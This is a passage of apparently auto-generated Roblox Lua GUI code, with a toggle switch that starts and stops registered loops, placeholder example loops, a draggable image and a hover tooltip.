					IsOn = not IsOn
					AnimateSwitch(IsOn)
	
					if IsOn then
						StartAll()
					else
						StopAll()
					end
				end
			end)
	
			--------------------------------------------------------------------
			-- EXAMPLE LOOPS YOU CAN ADD
			--------------------------------------------------------------------
			AddLoop("Example1", function()
				print("dziala")
			end)
	
			AddLoop("Example2", function()
				-- put ANY constant effect here
			end)
	
		end;
		task.spawn(C_e);
		-- StarterGui.O.A.A.ImageLabel.LocalScript
		local function C_10()
			local script = G2L["10"];
			script.Parent.Draggable=true
		end;
		task.spawn(C_10);
	
		return G2L["1"], require;
	end)
end;
task.spawn(C_31);
-- StarterGui.Petertiffon.ImageLabel.TextButton.LocalScript
local function C_32()
local script = G2L["32"];
	script.Parent.MouseEnter:Connect(function()
		script.Parent.TextLabel.Visible=true
	end)
	
	script.Parent.MouseLeave:Connect(function()
		script.Parent.TextLabel.Visible=false
	end)
end;
task.spawn(C_32);

return G2L["1"], require;
